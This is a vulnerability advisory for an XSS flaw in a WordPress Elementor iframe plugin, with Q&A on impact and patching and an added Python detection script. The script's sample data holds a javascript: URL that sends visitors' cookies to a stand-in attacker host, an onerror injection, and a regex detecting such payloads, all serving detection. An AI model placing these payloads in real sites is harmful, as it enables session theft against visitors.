CVE-2025-59553
BaseFortify
Publication date: 2025-09-22
Last updated on: 2026-04-23
Assigner: Patchstack
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| patchstack | custom_iframe_for_elementor | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a Cross Site Scripting (XSS) issue in the WordPress Custom iFrame for Elementor plugin (versions up to and including 1.0.13). It allows an attacker to inject malicious scripts or HTML payloads (redirects, advertisements and similar) that execute in the browser of visitors who view the affected page. The vulnerability is described as DOM-based and requires only contributor-level privileges to exploit. It falls under OWASP Top 10 category A3: Injection and has a CVSS base score of 6.5, which is Medium on the CVSS qualitative scale; the source describes the practical impact as low. [1]
How can this vulnerability impact me?
Exploitation of this vulnerability can lead to unauthorized script execution on your website, which may result in malicious redirects, unwanted advertisements, or other harmful HTML content being displayed to your visitors. Although the impact is considered low severity, attackers could use this to compromise user experience or potentially steal information. The vulnerability requires contributor-level privileges to exploit and is unlikely to be widely exploited, but automated attacks are possible. It is recommended to update to version 1.0.14 or later and consider professional incident response and server-side malware scanning if compromised. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves two checks: confirming whether the installed Custom iFrame for Elementor plugin is a vulnerable version (1.0.13 or earlier), and reviewing the pages that plugin renders for script injections or unexpected HTML payloads. Because the flaw is DOM-based XSS, look for unusual script tags, inline event handlers, or javascript: URLs in the page source and in the stored widget settings of pages that contributor-level users can edit. Network detection could involve inspecting HTTP responses for injected scripts. No specific commands are provided in the available resources. It is recommended to perform server-side malware scanning and professional incident response if compromise is suspected. [1]
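Added example of the two detection checks above. This is not code from the BaseFortify page or from Patchstack; it is an offline script that (1) decides whether an installed plugin version predates the 1.0.14 fix named on this page and (2) walks the JSON that Elementor stores in the `_elementor_data` post meta and flags widget settings containing script-like content. The plugin slug `custom-iframe-for-elementor`, the widget type name `custom_iframe`, and the sample Elementor data are assumptions constructed for the example, not taken from the advisory.

```python
"""Offline checks for CVE-2025-59553 (Custom iFrame for Elementor <= 1.0.13).

Added example, not the page's or the plugin vendor's code. Assumed names:
plugin slug "custom-iframe-for-elementor", widget type "custom_iframe".
"""
import json
import re
from typing import Iterator

FIXED_VERSION = (1, 0, 14)  # first patched release named on the page

# Markers of injected script rather than a plain embed URL
SUSPICIOUS = re.compile(
    r"<\s*script\b"          # inline <script> tags
    r"|javascript\s*:"       # javascript: URLs in src/href
    r"|\bon[a-z]+\s*=",      # inline event handlers (onload=, onerror=)
    re.IGNORECASE,
)


def parse_version(v: str) -> tuple:
    """'1.0.13' -> (1, 0, 13); tolerates suffixes like '1.0.13-beta'."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def is_affected_version(installed: str) -> bool:
    """True when the installed version predates the fix (<= 1.0.13)."""
    return parse_version(installed) < FIXED_VERSION


def _walk(elements: list, path: str = "") -> Iterator[tuple]:
    """Depth-first walk of Elementor's section/column/widget tree."""
    for i, el in enumerate(elements):
        here = f"{path}/{i}:{el.get('widgetType') or el.get('elType')}"
        yield here, el
        yield from _walk(el.get("elements", []), here)


def _strings(value) -> Iterator[str]:
    """Yield every string nested anywhere inside a widget's settings."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)


def scan_elementor_data(raw: str, widget_type: str = "custom_iframe") -> list:
    """Return [(element_path, offending_setting_value), ...].

    Only widgets of `widget_type` are inspected; pass None to scan every
    widget on the page (useful when the XSS sink is not known precisely).
    """
    hits = []
    for path, el in _walk(json.loads(raw)):
        if el.get("elType") != "widget":
            continue
        if widget_type and el.get("widgetType") != widget_type:
            continue
        for s in _strings(el.get("settings", {})):
            if SUSPICIOUS.search(s):
                hits.append((path, s))
    return hits


# Constructed sample of `_elementor_data` (assumed widget type name).
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1", "elType": "section", "elements": [
        {"id": "b2", "elType": "column", "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "custom_iframe",
             "settings": {"url": "https://example.com/embed"}},
            {"id": "d4", "elType": "widget", "widgetType": "custom_iframe",
             "settings": {"url": "javascript:location='https://evil.example/?c='+document.cookie"}},
            {"id": "e5", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Welcome <img src=x onerror=alert(1)>"}},
        ]},
    ]},
])


if __name__ == "__main__":
    print("1.0.13 affected:", is_affected_version("1.0.13"))
    print("1.0.14 affected:", is_affected_version("1.0.14"))
    for path, value in scan_elementor_data(SAMPLE_ELEMENTOR_DATA, widget_type=None):
        print(f"suspicious setting at {path}: {value!r}")
```

On a live site the inputs come from WP-CLI: `wp plugin get custom-iframe-for-elementor --field=version` gives the installed version (slug assumed), and `wp post meta get <post_id> _elementor_data` dumps the JSON for one page so it can be fed to `scan_elementor_data`. The regex is a triage filter, not a proof of compromise; review every hit by hand and treat a javascript: URL or an event handler in a contributor-edited page as an incident, not a false positive.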
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include updating the Custom iFrame for Elementor plugin to version 1.0.14 or later, where the vulnerability is fixed. Additionally, Patchstack offers virtual patching (vPatching) as an immediate protective measure that auto-mitigates the vulnerability even before official patches are applied. Users should also ensure timely updates and consider professional incident response and server-side malware scanning if a compromise is suspected. [1]